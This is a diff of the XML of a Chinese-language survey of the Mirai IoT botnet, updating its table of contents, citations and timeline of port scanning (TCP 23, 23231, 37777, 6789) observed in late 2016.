--- a/media/download/mirai-survey.docx
+++ b/media/download/mirai-survey.docx
@@ -6,7 +6,7 @@
       <w:pPr>
         <w:pStyle w:val="ad"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc469905243"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc472191665"/>
       <w:r>
         <w:t>Mirai</w:t>
       </w:r>
@@ -32,7 +32,7 @@
         <w:t>cDDoS</w:t>
       </w:r>
       <w:r>
-        <w:t>团队</w:t>
+        <w:t>研究组</w:t>
       </w:r>
     </w:p>
     <w:sdt>
@@ -88,7 +88,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc469905243" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191665" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -123,7 +123,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905243 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191665 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -164,7 +164,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc469905244" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191666" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -192,7 +192,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905244 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191666 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -233,7 +233,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc469905245" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191667" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -261,7 +261,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905245 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191667 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -303,7 +303,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc469905246" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191668" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -344,7 +344,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905246 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191668 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -386,7 +386,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc469905247" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191669" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -427,7 +427,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905247 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191669 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -469,7 +469,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc469905248" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191670" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -488,7 +488,7 @@
                 <w:rStyle w:val="a4"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>C&amp;C</w:t>
+              <w:t>C2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -532,7 +532,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905248 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191670 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -552,7 +552,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -573,7 +573,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc469905249" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191671" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -601,7 +601,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905249 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191671 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -621,7 +621,277 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="20"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="840"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc472191672" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="a4"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="a4"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Mirai(23)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="a4"/>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>感染原理</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191672 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="20"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="840"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc472191673" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="a4"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="a4"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Mirai(7547)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="a4"/>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>感染原理</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191673 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="20"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="840"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc472191674" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="a4"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>4.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="a4"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Mirai(6789)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="a4"/>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>感染原理</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191674 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -642,7 +912,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc469905250" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191675" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -670,7 +940,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905250 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191675 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -690,7 +960,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -712,7 +982,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc469905251" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191676" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -753,7 +1023,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905251 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191676 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -773,7 +1043,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -795,7 +1065,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc469905252" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191677" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -836,7 +1106,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905252 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191677 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -856,7 +1126,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -877,7 +1147,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc469905253" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191678" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -905,7 +1175,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905253 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191678 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -925,7 +1195,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -946,7 +1216,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc469905254" w:history="1">
+          <w:hyperlink w:anchor="_Toc472191679" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a4"/>
@@ -975,7 +1245,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc469905254 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc472191679 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -995,7 +1265,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1023,7 +1293,7 @@
       <w:pPr>
         <w:pStyle w:val="1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc469905244"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc472191666"/>
       <w:r>
         <w:t>事件</w:t>
       </w:r>
@@ -1052,7 +1322,6 @@
           <w:id w:val="1183400632"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
@@ -1319,16 +1588,11 @@
       <w:r>
         <w:t>DNS</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>水刑</w:t>
       </w:r>
       <w:r>
-        <w:t>式</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>攻击</w:t>
+        <w:t>式攻击</w:t>
       </w:r>
       <w:r>
         <w:t>)</w:t>
@@ -1338,7 +1602,6 @@
           <w:id w:val="-1257669740"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
@@ -1381,7 +1644,6 @@
           <w:id w:val="-1363128497"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
@@ -1453,7 +1715,6 @@
           <w:id w:val="-1266140765"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
@@ -1537,6 +1798,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>2016年8月1日 Mirai开始扫描360蜜罐。由于Mirai的syn包特点，可将其与其他扫描源进行区分</w:t>
       </w:r>
       <w:sdt>
@@ -1547,7 +1809,6 @@
           <w:id w:val="-797831196"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
@@ -1598,15 +1859,7 @@
         <w:t>Mirai</w:t>
       </w:r>
       <w:r>
-        <w:t>仅扫描23端口。每日扫描源在2k～13k之间波动，中间两个波峰期每日扫描</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>源维持</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>在8k～11k上下</w:t>
+        <w:t>仅扫描23端口。每日扫描源在2k～13k之间波动，中间两个波峰期每日扫描源维持在8k～11k上下</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1625,7 +1878,6 @@
         <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>2016年9月6日</w:t>
       </w:r>
       <w:r>
@@ -1874,7 +2126,6 @@
           <w:id w:val="2066906145"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
@@ -1983,32 +2234,19 @@
         <w:t>“</w:t>
       </w:r>
       <w:r>
-        <w:t>Botnet</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve"> 14 14</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Botnet 14 14</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>”</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>攻击达</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>数日之久，峰值带宽500Gbps</w:t>
+        <w:t>攻击达数日之久，峰值带宽500Gbps</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2235,21 +2473,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>Mirai僵尸网络的扫描而</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>宕</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>机</w:t>
+        <w:t>Mirai僵尸网络的扫描而宕机</w:t>
       </w:r>
       <w:r>
         <w:t>，断网事故共持续数个小时</w:t>
@@ -2302,7 +2526,6 @@
           <w:id w:val="-1571730324"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
@@ -2425,8 +2648,6 @@
           </w:r>
         </w:sdtContent>
       </w:sdt>
-      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2447,9 +2668,40 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:t>2016年12月12日，360开始关注针对TCP/</w:t>
+      </w:r>
+      <w:r>
+        <w:t>23231和</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>TCP/37777上的端口扫描。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t>2016年12月18日，360发现了Mirai开始全网扫描大华的</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>TCP/</w:t>
+      </w:r>
+      <w:r>
         <w:t>6789端口</w:t>
       </w:r>
       <w:r>
@@ -2458,6 +2710,120 @@
         </w:rPr>
         <w:t>。</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>2016年12月</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>20</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>日，</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Fidelis Cybersecurity</w:t>
+      </w:r>
+      <w:r>
+        <w:t>公司的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>John Bambenek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>报告</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Mirai开始扫描TCP/23231端口</w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:id w:val="-1526558890"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:hint="eastAsia"/>
+            </w:rPr>
+            <w:instrText>CITATION Joh \l 2052</w:instrText>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:hint="eastAsia"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[7]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2470,28 +2836,27 @@
       <w:pPr>
         <w:pStyle w:val="1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc469905245"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc472191667"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>僵尸网络现状</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="2"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc472191668"/>
+      <w:r>
+        <w:t>僵尸网络规模</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc469905246"/>
-      <w:r>
-        <w:t>僵尸网络规模</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="4"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:ind w:firstLine="420"/>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
@@ -2507,27 +2872,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>受Mirai感染的设备会持续地在互联网上扫描物联网设备的IP地址。Mirai包含了一张子网</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>掩码白</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>名单表，其中包括专用网络的私有IP地址以及分配给美国邮政署和美国国防部IP地址，使用这些地址的设备将不会受Mirai感染</w:t>
+        <w:t>受Mirai感染的设备会持续地在互联网上扫描物联网设备的IP地址。Mirai包含了一张子网掩码白名单表，其中包括专用网络的私有IP地址以及分配给美国邮政署和美国国防部IP地址，使用这些地址的设备将不会受Mirai感染</w:t>
       </w:r>
       <w:sdt>
         <w:sdtPr>
@@ -2540,7 +2885,6 @@
           <w:id w:val="-1012985329"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -2605,7 +2949,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[6]</w:t>
+            <w:t>[8]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -2694,7 +3038,6 @@
           <w:id w:val="1530830256"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -2759,7 +3102,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[7]</w:t>
+            <w:t>[9]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -2806,27 +3149,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>全网潜在的可感染设备总数量在3～5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>百万</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
-          <w:kern w:val="0"/>
